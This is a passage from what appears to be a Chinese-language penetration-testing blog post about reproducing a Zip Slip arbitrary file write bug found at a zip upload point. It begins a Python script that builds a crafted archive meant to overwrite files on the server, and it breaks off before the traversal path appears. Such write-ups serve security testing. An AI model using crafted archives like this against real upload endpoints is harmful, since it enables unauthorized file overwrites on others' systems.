记一次Zip Slip任意文件写漏洞以及参考文章们
记一次Zip Slip任意文件写漏洞
漏洞复现
第一次在测试中见到这个安全问题,故记录一下。(由于涉及到公司信息,故打码严重,只做简单复现)
首先发现到这里存在一个zip文件上传点:
于是我们构造特殊的zip压缩文件。
import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'sec_test.txt'
#destination pa